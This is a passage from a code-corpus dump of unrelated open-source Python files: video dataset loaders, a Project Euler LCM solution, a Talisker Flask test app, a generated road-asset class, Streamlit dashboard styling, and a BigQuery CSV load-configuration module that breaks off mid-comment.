transform=Compose(
[
Lambda(div255),
NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
RandomShortSideScale(
min_size=cfg.DATA.TRAIN_JITTER_SCALES[0],
max_size=cfg.DATA.TRAIN_JITTER_SCALES[1],
),
RandomCropVideo(cfg.DATA.TRAIN_CROP_SIZE),
Lambda(rgb2bgr),
]
+ (
[RandomHorizontalFlipVideo(p=0.5)]
if cfg.DATA.RANDOM_FLIP
else []
)
+ [PackPathway(cfg)]
),
),
DictToTuple(num_clips, num_crops),
]
)
clip_sampler = make_clip_sampler(
"constant_clips_per_video",
1, # Put arbitrary duration as ssv2 always needs full video clip.
num_clips,
num_crops,
)
if cfg.NUM_GPUS > 1:
video_sampler = DistributedSampler
else:
video_sampler = (
RandomSampler if mode == "train" else SequentialSampler
)
else:
assert cfg.TEST.NUM_ENSEMBLE_VIEWS == 1
num_clips = cfg.TEST.NUM_ENSEMBLE_VIEWS
num_crops = cfg.TEST.NUM_SPATIAL_CROPS
transform = Compose(
[
ApplyTransformToKey(
key="video",
transform=Compose(
[
Lambda(div255),
NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
ShortSideScale(size=cfg.DATA.TEST_CROP_SIZE),
]
),
),
UniformCropVideo(size=cfg.DATA.TEST_CROP_SIZE),
ApplyTransformToKey(
key="video",
transform=Compose(
[Lambda(rgb2bgr), PackPathway(cfg)],
),
),
DictToTuple(num_clips, num_crops),
]
)
clip_sampler = make_clip_sampler(
"constant_clips_per_video",
1, # Put arbitrary duration as ssv2 always needs full video clip.
num_clips,
num_crops,
)
video_sampler = (
DistributedSampler if cfg.NUM_GPUS > 1 else SequentialSampler
)
label_name_file = os.path.join(
cfg.DATA.PATH_TO_DATA_DIR, "something-something-v2-labels.json"
)
video_label_file = os.path.join(
cfg.DATA.PATH_TO_DATA_DIR,
"something-something-v2-{}.json".format(
"train" if mode == "train" else "validation"
),
)
data_path = os.path.join(
cfg.DATA.PATH_TO_DATA_DIR,
"{}.csv".format("train" if mode == "train" else "val"),
)
dataset = SSv2(
label_name_file=label_name_file,
video_label_file=video_label_file,
video_path_label_file=data_path,
clip_sampler=clip_sampler,
video_sampler=video_sampler,
transform=transform,
video_path_prefix=cfg.DATA.PATH_PREFIX,
frames_per_clip=cfg.DATA.NUM_FRAMES,
rand_sample_frames=mode == "train",
)
logger.info(
"Constructing ssv2 dataloader (size: {}) from {}".format(
len(dataset._path_to_videos), data_path
)
)
return PTVDatasetWrapper(
num_videos=len(dataset._path_to_videos),
clips_per_video=num_clips,
crops_per_clip=num_crops,
dataset=dataset,
)
@DATASET_REGISTRY.register()
def Ptvfishbase(cfg, mode):
"""
Construct the Fishbase video loader with a directory, each directory is split into modes ('train', 'val', 'test')
and inside each mode are subdirectories for each label class.
For `train` and `val` mode, a single clip is randomly sampled from every video
with random cropping, scaling, and flipping. For `test` mode, multiple clips are
uniformaly sampled from every video with center cropping.
Args:
cfg (CfgNode): configs.
mode (string): Options includes `train`, `val`, or `test` mode.
For the train and val mode, the data loader will take data
from the train or val set, and sample one clip per video.
For the test mode, the data loader will take data from test set,
and sample multiple clips per video.
"""
# Only support train, val, and test mode.
assert mode in [
"train",
"val",
"test",
], "Split '{}' not supported".format(mode)
logger.info("Constructing Ptvfishbase {}...".format(mode))
clip_duration = (
cfg.DATA.NUM_FRAMES * cfg.DATA.SAMPLING_RATE / cfg.DATA.TARGET_FPS
)
path_to_dir = os.path.join(
cfg.DATA.PATH_TO_DATA_DIR, mode
)
labeled_video_paths = LabeledVideoPaths.from_directory(path_to_dir)
num_videos = len(labeled_video_paths)
labeled_video_paths.path_prefix = cfg.DATA.PATH_PREFIX
logger.info(
"Constructing kinetics dataloader (size: {}) from {}".format(
num_videos, path_to_dir
)
)
if mode in ["train", "val"]:
num_clips = 1
num_crops = 1
transform = Compose(
[
ApplyTransformToKey(
key="video",
transform=Compose(
[
UniformTemporalSubsample(cfg.DATA.NUM_FRAMES),
Lambda(div255),
#NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
ShortSideScale(cfg.DATA.TRAIN_JITTER_SCALES[0]),
]
+ (
[Lambda(rgb2gray)]
if cfg.DATA.INPUT_CHANNEL_NUM[0] == 1
else []
)
+ (
[RandomHorizontalFlipVideo(p=0.5)]
if cfg.DATA.RANDOM_FLIP
else []
)
+ [PackPathway(cfg)]
),
),
DictToTuple(num_clips, num_crops),
]
)
clip_sampler = make_clip_sampler("random", clip_duration)
if cfg.NUM_GPUS > 1:
video_sampler = DistributedSampler
else:
video_sampler = (
RandomSampler if mode == "train" else SequentialSampler
)
else:
num_clips = cfg.TEST.NUM_ENSEMBLE_VIEWS
num_crops = cfg.TEST.NUM_SPATIAL_CROPS
transform = Compose(
[
ApplyTransformToKey(
key="video",
transform=Compose(
[
UniformTemporalSubsample(cfg.DATA.NUM_FRAMES),
Lambda(div255),
NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
ShortSideScale(
size=cfg.DATA.TRAIN_JITTER_SCALES[0]
),
]
),
),
ApplyTransformToKey(key="video", transform=PackPathway(cfg)),
DictToTuple(num_clips, num_crops),
]
)
clip_sampler = make_clip_sampler(
"constant_clips_per_video",
clip_duration,
num_clips,
num_crops,
)
video_sampler = (
DistributedSampler if cfg.NUM_GPUS > 1 else SequentialSampler
)
return PTVDatasetWrapper(
num_videos=num_videos,
clips_per_video=num_clips,
crops_per_clip=num_crops,
dataset=LabeledVideoDataset(
labeled_video_paths=labeled_video_paths,
clip_sampler=clip_sampler,
video_sampler=video_sampler,
transform=transform,
decode_audio=False,
),
)
| 32.89932 | 117 | 0.538274 |
e4b894bf1b40aca3b88e3b9db3fe6390c3009216 | 330 | py | Python | ProjectEuler/problem_5.py | aaditkamat/competitive-programming | d0b8f30d3cb3411d2467b98363c12d75d852e245 | [
"MIT"
] | null | null | null | ProjectEuler/problem_5.py | aaditkamat/competitive-programming | d0b8f30d3cb3411d2467b98363c12d75d852e245 | [
"MIT"
] | 3 | 2019-02-24T11:42:28.000Z | 2019-06-03T14:15:46.000Z | ProjectEuler/problem_5.py | aaditkamat/online-judge-submissions | d0b8f30d3cb3411d2467b98363c12d75d852e245 | [
"MIT"
] | null | null | null | def gcd(x, y):
arr = []
for i in range(1, min(x, y) + 1):
if x % i == 0 and y % i == 0:
arr.append(i)
return arr[-1]
def lcm(x, y):
return (x * y) // gcd(x, y)
def solution(num):
result = 2
for i in range(3, num):
result = lcm(result, i)
return result
print(solution(20)) | 19.411765 | 37 | 0.484848 |
83d45b714290133d8387d707a3aae43625fa7c53 | 2,484 | py | Python | tests/flask_app.py | renovate-tests/talisker | ba313b6e52677852560e89365c58efe7b091c6ca | [
"Apache-2.0"
] | null | null | null | tests/flask_app.py | renovate-tests/talisker | ba313b6e52677852560e89365c58efe7b091c6ca | [
"Apache-2.0"
] | null | null | null | tests/flask_app.py | renovate-tests/talisker | ba313b6e52677852560e89365c58efe7b091c6ca | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2015-2018 Canonical, Ltd.
#
# This file is part of Talisker
# (see http://github.com/canonical-ols/talisker).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
from flask import Flask
import sqlalchemy
from sqlalchemy import Table, Column, Integer, String, MetaData, select
from werkzeug.wrappers import Response
import talisker.flask
from talisker.postgresql import TaliskerConnection
logger = logging.getLogger(__name__)
engine = sqlalchemy.create_engine(
'postgresql://django_app:django_app@localhost:5432/django_app',
connect_args={'connection_factory': TaliskerConnection},
)
metadata = MetaData()
users = Table(
'users',
metadata,
Column('id', Integer, primary_key=True),
Column('name', String),
Column('fullname', String),
)
metadata.create_all(engine)
conn = engine.connect()
conn.execute(users.insert().values(name='jack', fullname='Jack Jones'))
app = Flask(__name__)
talisker.flask.register(app)
logger = logging.getLogger(__name__)
@app.route('/')
def index():
return 'ok'
@app.route('/logging')
def logging():
logger.info('info', extra={'foo': 'bar'})
app.logger.info('app logger')
talisker.requests.get_session().post(
'http://httpbin.org/post', json={'foo': 'bar'})
return 'ok'
@app.route('/error/')
def error():
conn.execute(select([users]))
talisker.requests.get_session().post(
'http://httpbin.org/post', json={'foo': 'bar'})
logger.info('halp', extra={'foo': 'bar'})
raise Exception('test')
@app.route('/nested')
def nested():
logger.info('here')
resp = talisker.requests.get_session().get('http://10.0.4.1:1234')
return Response(resp.content, status=200, headers=resp.headers.items())
| 28.551724 | 75 | 0.716989 |
46459adaa9e429a94a3c24cbb9447a9f7195065d | 3,003 | py | Python | src/OTLMOW/OTLModel/Classes/PoEInjector.py | davidvlaminck/OTLClassPython | 71330afeb37c3ea6d9981f521ff8f4a3f8b946fc | [
"MIT"
] | 2 | 2022-02-01T08:58:11.000Z | 2022-02-08T13:35:17.000Z | src/OTLMOW/OTLModel/Classes/PoEInjector.py | davidvlaminck/OTLMOW | 71330afeb37c3ea6d9981f521ff8f4a3f8b946fc | [
"MIT"
] | null | null | null | src/OTLMOW/OTLModel/Classes/PoEInjector.py | davidvlaminck/OTLMOW | 71330afeb37c3ea6d9981f521ff8f4a3f8b946fc | [
"MIT"
] | null | null | null | # coding=utf-8
from OTLMOW.OTLModel.BaseClasses.OTLAttribuut import OTLAttribuut
from OTLMOW.OTLModel.Classes.AIMNaamObject import AIMNaamObject
from OTLMOW.OTLModel.Datatypes.DtcDocument import DtcDocument
from OTLMOW.OTLModel.Datatypes.KlPoEInjectorMerk import KlPoEInjectorMerk
from OTLMOW.OTLModel.Datatypes.KlPoEInjectorModelnaam import KlPoEInjectorModelnaam
from OTLMOW.GeometrieArtefact.PuntGeometrie import PuntGeometrie
# Generated with OTLClassCreator. To modify: extend, do not edit
class PoEInjector(AIMNaamObject, PuntGeometrie):
"""Een toestel waarmee stroom/voeding voor een ander toestel over een datakabel kan gestuurd worden."""
typeURI = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#PoEInjector'
"""De URI van het object volgens https://www.w3.org/2001/XMLSchema#anyURI."""
def __init__(self):
AIMNaamObject.__init__(self)
PuntGeometrie.__init__(self)
self._merk = OTLAttribuut(field=KlPoEInjectorMerk,
naam='merk',
label='merk',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#PoEInjector.merk',
definition='Het merk van de PoE-injector.',
owner=self)
self._modelnaam = OTLAttribuut(field=KlPoEInjectorModelnaam,
naam='modelnaam',
label='modelnaam',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#PoEInjector.modelnaam',
definition='De modelnaam van de PoE-injector.',
owner=self)
self._technischeFiche = OTLAttribuut(field=DtcDocument,
naam='technischeFiche',
label='technische fiche',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#PoEInjector.technischeFiche',
definition='De technische fiche van de PoE-injector.',
owner=self)
@property
def merk(self):
"""Het merk van de PoE-injector."""
return self._merk.get_waarde()
@merk.setter
def merk(self, value):
self._merk.set_waarde(value, owner=self)
@property
def modelnaam(self):
"""De modelnaam van de PoE-injector."""
return self._modelnaam.get_waarde()
@modelnaam.setter
def modelnaam(self, value):
self._modelnaam.set_waarde(value, owner=self)
@property
def technischeFiche(self):
"""De technische fiche van de PoE-injector."""
return self._technischeFiche.get_waarde()
@technischeFiche.setter
def technischeFiche(self, value):
self._technischeFiche.set_waarde(value, owner=self)
| 44.161765 | 140 | 0.602398 |
820fce50da6dd16183668d25b5ac23caaf5ea9b3 | 8,012 | py | Python | customize.py | Denaro1234/Covid-dashboard | 46d94e87b5fb68eb41290d2cd4f2a24c3e8ef381 | [
"CC-BY-4.0"
] | null | null | null | customize.py | Denaro1234/Covid-dashboard | 46d94e87b5fb68eb41290d2cd4f2a24c3e8ef381 | [
"CC-BY-4.0"
] | null | null | null | customize.py | Denaro1234/Covid-dashboard | 46d94e87b5fb68eb41290d2cd4f2a24c3e8ef381 | [
"CC-BY-4.0"
] | null | null | null | import streamlit as st
import os
PATH = os.path.abspath('')
def page_config():
'''This function is built-in streamlit function for page configuration'''
st.set_page_config(
page_title="Covid-19 Dashboard",
page_icon=PATH + os.sep + 'data/icon.png'
)
def container_map():
'''This function customizes container css if it is in the map view'''
st.markdown(
"""
<style>
.css-1v3fvcr {
position: static;
flex-direction: row;
overflow: visible;
}
.reportview-container .main .block-container{
max-width: 100%;
padding-top: 0rem;
padding-left: 0rem;
padding-right: 0rem;
padding-bottom: 0rem;
}
.css-12oz5g7 {
margin-top: -112px;
margin-bottom: -64px;
}
.js-plotly-plot .plotly .modebar{
position: fixed;
right: 70px;
top: 15px;
}
.js-plotly-plot .plotly .mapboxgl-ctrl-bottom-right{
position: fixed;
}
.js-plotly-plot .plotly .modebar--hover > :not(.watermark){
padding-bottom: 8px;
}
</style>
""",
unsafe_allow_html=True,
)
def container_map_continent():
'''This function customizes container css in the map view and if a continent is selected'''
st.markdown(
"""
<style>
.css-1v3fvcr {
position: static;
flex-direction: row;
overflow: visible;
}
.reportview-container .main .block-container{
max-width: 100%;
padding-top: 0rem;
padding-left: 0rem;
padding-right: 0rem;
padding-bottom: 0rem;
}
.css-12oz5g7 {
margin-top: -64px;
margin-bottom: -64px;
}
.js-plotly-plot .plotly .modebar{
position: fixed;
right: 70px;
top: 15px;
}
.js-plotly-plot .plotly .mapboxgl-ctrl-bottom-right{
position: fixed
}
.js-plotly-plot .plotly .modebar--hover > :not(.watermark){
padding-bottom: 8px;
}
</style>
""",
unsafe_allow_html=True,
)
def container_chart():
'''This function customizes container css in chart view'''
st.markdown(
"""
<style>
.css-1v3fvcr {
position: relative;
flex-direction: column;
overflow: auto;
}
.reportview-container .main .block-container{
max-width: 100%;
padding-top: 1rem;
padding-left: 0rem;
padding-right: 0rem;
padding-bottom: 0rem;
}
.css-12oz5g7 {
margin-top: -64px;
margin-bottom: -64px;
}
.js-plotly-plot .plotly .modebar{
position: absolute;
right: 32px;
top: 80px;
}
</style>
""",
unsafe_allow_html=True,
)
def sidebar():
'''This function customizes sidebar css'''
st.markdown(
"""
<style>
[data-testid="stSidebar"][aria-expanded="true"] > div:first-child {
padding-top: 0rem;
}
[data-testid="stSidebar"][aria-expanded="false"] > div:first-child {
padding-top: 0rem;
}
</style>
""",
unsafe_allow_html=True,
)
# if you wanna change sidebar width, just add: width: 450px
def footer():
'''This function customizes footer css'''
st.markdown("""
<style>
footer {
visibility: hidden;
}
.css-12gp8ed {
max-width: 0rem;
padding: 0rem;
}
</style>
""",
unsafe_allow_html=True,
)
def back_to_map_button():
'''This function customizes back_to_map button css'''
st.markdown("""
<style>
.css-ns78wr {
margin-top: 18px;
margin-left: 64px;
border-color: rgb(255, 75, 75);
background-color: rgb(255, 75, 75);
color: white;
}
.css-ns78wr:hover {
background-color: white;
color: rgb(255, 75, 75);
}
</style>
""",
unsafe_allow_html=True,
)
def dropdown():
'''This function customizes dropdown menu css'''
st.markdown(
"""
<style>
.css-1d0tddh {
text-overflow: clip;
overflow: revert;
white-space: nowrap;
}
</style>
""",
unsafe_allow_html=True,
)
def expander_html_1():
st.write("""
<p style='text-align: justify;'><b>Welcome to my Dashboard!</b></p>
<p style='text-align: justify;'>Select from 23 daily updated COVID-19 related data categories to visualize trends of the pandemic in different countries or continents and the world.</p>
<p style='text-align: justify;'><b>1. Compare countries on the map.</b> Select a data category, a date and a continent for setting the zoom. Finally, hit Submit. (Hint: select "World" in the continent selector for world view.)</p>
<p style='text-align: justify;'><b>2. Compare countries on line chart.</b> Select one or more data categories and countries. Finally, hit Submit. (Hints: 1. Select the displayed time range on the left corner of the charts or set it with the range selector below. 2. Click on "World" in the legend to display the trace of World data.)</p>
<p style='text-align: justify;'><b>3. Compare countries on bar chart.</b> Select one or more data categories and countries. Finally, hit Submit. (Hint: 1. Set the range of the displayed bars with the range selector below.)</p>
<p style='text-align: justify;'>Hit Submit once again if you modified the selection criteria.</p>
<p style='text-align: justify;'>Hit "Go back to map view" to go back to the main page.</p>
""",
unsafe_allow_html=True,
)
def expander_html_2():
st.write("""
<p><b>1. Sources:</b></p>
<ul style= 'margin-bottom: 16px;'>
<li>COVID-19: <a href="https://github.com/owid/covid-19-data/tree/master/public/data" target="_blank">Our World in Data</a>, License: <a href="https://creativecommons.org/licenses/by/4.0/" target="_blank">“CC BY-ND 4.0”</a></li>
<li>Country Coordinates: <a href="https://www.kaggle.com/nikitagrec/world-capitals-gps" target="_blank">Kaggle</a></li>
<li>Page Icon: <a href="https://en.wikipedia.org/wiki/File:Coronavirus_icon.svg" target="_blank">Lucbyhet</a>,<br>License: <a href="https://creativecommons.org/licenses/by/4.0/" target="_blank">“CC BY-ND 4.0”</a></li>
</ul>
<p><b>2. COVID-19 data categories:</b></p>
<ol style= 'margin-bottom: 16px;'>
<li>New cases</li>
<li>New cases (Last 7-day average)</li>
<li>Total cases</li>
<li>New cases per million</li>
<li>New cases per million (Last 7-day average)</li>
<li>Total cases per million</li>
<li>New deaths</li>
<li>New deaths (Last 7-day average)</li>
<li>Total deaths</li>
<li>New deaths per million</li>
<li>New deaths per million (Last 7-day average)</li>
<li>Total deaths per million</li>
<li>Patients in intensive care</li>
<li>Patients in intensive care per million</li>
<li>Hospitalized patients</li>
<li>Hospitalized patients per million</li>
<li>Stringency index</li>
<li>New tests</li>
<li>Total tests</li>
<li>Reproduction rate</li>
<li>People fully vaccinated</li>
<li>People fully vaccinated (%)</li>
<li>Total boosters (%)</li>
</ol>
<p style='text-align: justify;'>For more information on the data categories, please visit the Github repository (link below)</p>
<p><b>3. Further developments:<b></p>
<ul style= 'margin-bottom: 16px;'>
<li>Adding forecasting function in all data categories (ARIMA)</li>
<li>Automatic interpretation of trends and evaluation of figures</li>
<li>Linking scatter map and charts with mouse click/select event</li>
</ul>
<p><b>4. Created by Attila Orosz: <a href="https://github.com/orosz-attila/Covid-19-Dashboard" target="_blank">Github</a><b></p>
""",
unsafe_allow_html=True,
) | 30.697318 | 341 | 0.593984 |
378a256524d8d02946963e6b0e4fed279f4d7678 | 14,999 | py | Python | records_mover/db/bigquery/load_job_config_options.py | cwegrzyn/records-mover | e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2 | [
"Apache-2.0"
] | 36 | 2020-03-17T11:56:51.000Z | 2022-01-19T16:03:32.000Z | records_mover/db/bigquery/load_job_config_options.py | cwegrzyn/records-mover | e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2 | [
"Apache-2.0"
] | 60 | 2020-03-02T23:13:29.000Z | 2021-05-19T15:05:42.000Z | records_mover/db/bigquery/load_job_config_options.py | cwegrzyn/records-mover | e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2 | [
"Apache-2.0"
] | 4 | 2020-08-11T13:17:37.000Z | 2021-11-05T21:11:52.000Z | from ...utils import quiet_remove
from ...records.delimited import cant_handle_hint
from typing import Set
from ...records.load_plan import RecordsLoadPlan
from ...records.records_format import (
DelimitedRecordsFormat, ParquetRecordsFormat, AvroRecordsFormat
)
from records_mover.records.delimited import ValidatedRecordsHints
from records_mover.mover_types import _assert_never
from google.cloud.bigquery.job import CreateDisposition, WriteDisposition
from google.cloud import bigquery
import logging
logger = logging.getLogger(__name__)
def load_job_config(unhandled_hints: Set[str],
load_plan: RecordsLoadPlan) -> bigquery.LoadJobConfig:
# https://cloud.google.com/bigquery/docs/loading-data-cloud-storage-parquet#type_conversions
# https://googleapis.github.io/google-cloud-python/latest/bigquery/generated/google.cloud.bigquery.job.LoadJobConfig.html
# https://cloud.google.com/bigquery/docs/reference/rest/v2/JobConfiguration#JobConfigurationTableCopy
fail_if_cant_handle_hint = load_plan.processing_instructions.fail_if_cant_handle_hint
config = bigquery.LoadJobConfig()
# clustering_fields: Fields defining clustering for the table
#
# > Currently, BigQuery supports clustering over a partitioned
# > table. Use clustering over a partitioned table when:
# > * Your data is already partitioned on a date or timestamp column.
# > * You commonly use filters or aggregation against
# > particular columns in your queries.
#
# https://cloud.google.com/bigquery/docs/clustered-tables
config.clustering_fields = None
# autodetect: Automatically infer the schema from a sample of the data.
# schema: Schema of the destination table.
# create_disposition: Specifies behavior for creating tables.
#
# Rely on prep.py in records/ to create the table.
config.autodetect = False
config.create_disposition = CreateDisposition.CREATE_NEVER
# destination_encryption_configuration: Custom encryption configuration for
# the destination table.
#
# Custom encryption configuration (e.g., Cloud KMS keys) or
# None if using default encryption.
config.destination_encryption_configuration = None
# destination_table_description: Union[str, None] name given to destination
# table.
config.destination_table_description = None
# destination_table_friendly_name: Union[str, None] name given
# to destination table.
config.destination_table_friendly_name = None
# ignore_unknown_values: Ignore extra values not represented
# in the table schema
config.ignore_unknown_values = load_plan.processing_instructions.fail_if_row_invalid
# max_bad_records: Number of invalid rows to ignore.
if load_plan.processing_instructions.max_failure_rows is not None:
config.max_bad_records = load_plan.processing_instructions.max_failure_rows
config.allow_jagged_rows = True
elif load_plan.processing_instructions.fail_if_row_invalid:
config.max_bad_records = 0
config.allow_jagged_rows = False
else:
config.max_bad_records = 999999
config.allow_jagged_rows = True
# write_disposition: Action that occurs if the destination
# table already exists.
#
# Since prep.py handles whatever policy, the table will be
# already empty if we don't want to append anyway:
config.write_disposition = WriteDisposition.WRITE_APPEND
# time_partitioning: Specifies time-based partitioning for the
# destination table.
# use_avro_logical_types: For loads of Avro data, governs whether Avro
# logical types are converted to their corresponding BigQuery types
# labels: Labels for the job.
#
# This method always returns a dict. To change a job’s labels,
# modify the dict, then call Client.update_job. To delete a
# label, set its value to None before updating.
# schema_update_options: Specifies updates to the destination
# table schema to allow as a side effect of the load job.
#
# Allows the schema of the destination table to be updated as
# a side effect of the query job. Schema update options are
# supported in two cases: when writeDisposition is
# WRITE_APPEND; when writeDisposition is WRITE_TRUNCATE and
# the destination table is a partition of a table, specified
# by partition decorators. For normal tables, WRITE_TRUNCATE
# will always overwrite the schema. One or more of the
# following values are specified: ALLOW_FIELD_ADDITION: allow
# adding a nullable field to the
# schema. ALLOW_FIELD_RELAXATION: allow relaxing a required
# field in the original schema to nullable.
config.schema_update_options = None
fail_if_cant_handle_hint = load_plan.processing_instructions.fail_if_cant_handle_hint
if isinstance(load_plan.records_format, DelimitedRecordsFormat):
hints = load_plan.records_format.validate(fail_if_cant_handle_hint=fail_if_cant_handle_hint)
add_load_job_csv_config(unhandled_hints,
hints,
fail_if_cant_handle_hint,
config)
return config
if isinstance(load_plan.records_format, ParquetRecordsFormat):
config.source_format = 'PARQUET'
return config
if isinstance(load_plan.records_format, AvroRecordsFormat):
config.source_format = 'AVRO'
# https://cloud.google.com/bigquery/docs/loading-data-cloud-storage-avro#logical_types
config.use_avro_logical_types = True
return config
raise NotImplementedError("Not currently able to load "
f"{load_plan.records_format.format_type}")
def add_load_job_csv_config(unhandled_hints: Set[str],
hints: ValidatedRecordsHints,
fail_if_cant_handle_hint: bool,
config: bigquery.LoadJobConfig) -> None:
# source_format: File format of the data.
config.source_format = 'CSV'
# encoding: The character encoding of the data.
# The supported values are UTF-8 or ISO-8859-1.
# "UTF-8 or ISO-8859-1"
#
if hints.encoding == 'UTF8':
config.encoding = 'UTF-8'
else:
# Currently records hints don't support ISO-8859-1
cant_handle_hint(fail_if_cant_handle_hint, 'encoding', hints)
quiet_remove(unhandled_hints, 'encoding')
# field_delimiter: The separator for fields in a CSV file.
assert isinstance(hints.field_delimiter, str)
config.field_delimiter = hints.field_delimiter
quiet_remove(unhandled_hints, 'field-delimiter')
# allow_jagged_rows: Allow missing trailing optional columns (CSV only).
# null_marker: Represents a null value (CSV only)
#
# (documentation is mangled for this one, but I assume the default is
# '' or something sensible, so not messing with it)
# quote_character: Character used to quote data sections (CSV
# only).
#
# [Optional] The value that is used to quote data sections in
# a CSV file. BigQuery converts the string to ISO-8859-1
# encoding, and then uses the first byte of the encoded string
# to split the data in its raw, binary state. The default
# value is a double-quote ('"'). If your data does not contain
# quoted sections, set the property value to an empty
# string. If your data contains quoted newline characters, you
# must also set the allowQuotedNewlines property to
# true.
#
# @default "
# I tried a few combinations and found that when you leave quote_character as the default
#
# * Fields quoted with "" are loaded without the surrounding quotes in the
# string
# * "" becomes " in a quoted field
# * "" stays "" in a non-quoted field
# * nonnumeric quoting works fine
# * full quoting works fine
if hints.quoting is None:
config.quote_character = ''
elif hints.quoting == 'all' or hints.quoting == 'minimal' or hints.quoting == 'nonnumeric':
# allow_quoted_newlines: Allow quoted data containing newline
# characters (CSV only).
config.allow_quoted_newlines = True
assert isinstance(hints.quotechar, str)
config.quote_character = hints.quotechar
if hints.doublequote:
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'doublequote', hints)
else:
_assert_never(hints.quoting)
quiet_remove(unhandled_hints, 'quoting')
quiet_remove(unhandled_hints, 'quotechar')
quiet_remove(unhandled_hints, 'doublequote')
# No mention of escaping in BigQuery documentation, and in
# practice backslashes come through without being interpreted.
if hints.escape is None:
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'escape', hints)
quiet_remove(unhandled_hints, 'escape')
# skip_leading_rows: Number of rows to skip when reading data (CSV only).
if hints.header_row:
config.skip_leading_rows = 1
else:
config.skip_leading_rows = 0
quiet_remove(unhandled_hints, 'header-row')
# "When you load CSV or JSON data, values in DATE columns must
# use the dash (-) separator and the date must be in the
# following format: YYYY-MM-DD (year-month-day)."
if hints.dateformat == 'YYYY-MM-DD':
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'dateformat', hints)
quiet_remove(unhandled_hints, 'dateformat')
# "When you load JSON or CSV data, values in TIMESTAMP columns
# must use a dash (-) separator for the date portion of the
# timestamp, and the date must be in the following format:
# YYYY-MM-DD (year-month-day). The hh:mm:ss
# (hour-minute-second) portion of the timestamp must use a
# colon (:) separator."
#
#
# To test, log into BigQuery web console and try SQL like this
# (assumption is that the same timestamp parser is used during
# CSV loads)
#
# select TIMESTAMP("2000-01-02 16:34:56.789012US/Eastern") as a;
#
# Tests performed and result displayed on console query:
#
# DATE:
# * 01-02-2019 (rejected):
# * 01/02/19 (rejected):
# * 2019-01-01 (accepted): 2019-01-01
# DATETIME:
# * 2019-01-01 1:00pm (rejected):
# * 2019-01-01 1:00:00pm (rejected)
# * 2019-01-01 1:00PM (rejected):
# * 2019-01-01 13:00 (rejected):
# * 2019-01-01 13:00:00 (accepted): 2019-01-01T13:00:00
# * 2019-01-01 1:00pm US/Eastern (rejected):
# * 2019-01-01 1:00:00pm US/Eastern (rejected):
# * 2019-01-01 13:00:00 US/Eastern (rejected):
# * 2019-01-01 13:00:00 EST (rejected):
# * 1997-12-17 07:37:16-08 (rejected)
# * 2019-01-01T13:00:00 (accepted): 2019-01-01T13:00:00
#
# TIME:
# * 1:00pm (rejected):
# * 1:00:00pm (rejected):
# * 13:00 (rejected):
# * 13:00:00 (accepted): 13:00:00
# * 1:00pm US/Eastern (rejected):
# * 1:00pm EST (rejected):
# * 07:37:16-08 (rejected):
#
# TIMESTAMP ("Required format is YYYY-MM-DD
# HH:MM[:SS[.SSSSSS]]", which is BS, as it doesn't specify the
# timezone format):
#
# * 2019-01-01 1:00pm (rejected):
# * 2019-01-01 1:00:00pm (rejected)
# * 2019-01-01 1:00PM (rejected):
# * 2019-01-01 13:00 (rejected):
# * 2019-01-01 13:00:00 (accepted): 2019-01-01T13:00:00
# * 2019-01-01 1:00pm US/Eastern (rejected):
# * 2019-01-01 1:00:00pm US/Eastern (rejected):
# * 2019-01-01 13:00:00 US/Eastern (rejected):
# * 2019-01-01 13:00:00 EST (rejected):
# * 1997-12-17 07:37:16-08 (accepted): 1997-12-17 15:37:16 UTC
# * 2019-01-01T13:00:00-08 (accepted): 2019-01-01 21:00:00 UTC
# * 2000-01-02 16:34:56.789012+0000 (rejected)
# * 2000-01-02 16:34:56.789012+00:00 (accepted)
# * 2000-01-02 16:34:56.789012EST (rejected)
# * 2000-01-02 16:34:56.789012US/Eastern (rejected)
# * 2000-01-02 16:34:56.789012UTC (accepted): 2000-01-02 16:34:56.789012 UTC
# * 2000-01-02 16:34:56.789012 UTC (accepted: 2000-01-02 16:34:56.789012 UTC
#
# https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#examples
#
# https://stackoverflow.com/questions/47466296/bigquery-datetime-format-csv-to-bigquery-yyyy-mm-dd-hhmmss-ssssss
#
# BigQuery supports exactly one format of ingesting timestamps
# with timezones (what they call 'TIMESTAMP' they call timestamps
# without timezones 'DATETIME'.
#
# That format they accept is ISO 8601, which sounds all nice and
# standardy. Usable timestamps look like 2000-01-02
# 16:34:56.789012+00:00.
# Cool cool. The only issue is that Python's strftime doesn't
# actually provide a way to add the ':' in the timezone
# offset. The only timezone offset code, %z, does not provide the
# colon. Other implementations (GNU libc) offers the %:z option,
# but that doesn't exist in Python and thus in Pandas.
#
# So if you're using Python to export timestamps with timezones,
# you should probably use the `YYYY-MM-DD HH24:MI:SS` format and
# express them in UTC.
#
# https://stackoverflow.com/questions/44836581/does-python-time-strftime-process-timezone-options-correctly-for-rfc-3339
# https://stackoverflow.com/questions/28729212/pandas-save-date-in-iso-format
#
if hints.datetimeformat in ['YYYY-MM-DD HH24:MI:SS', 'YYYY-MM-DD HH:MI:SS']:
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'datetimeformat', hints)
quiet_remove(unhandled_hints, 'datetimeformat')
if hints.datetimeformattz in ['YYYY-MM-DD HH:MI:SSOF',
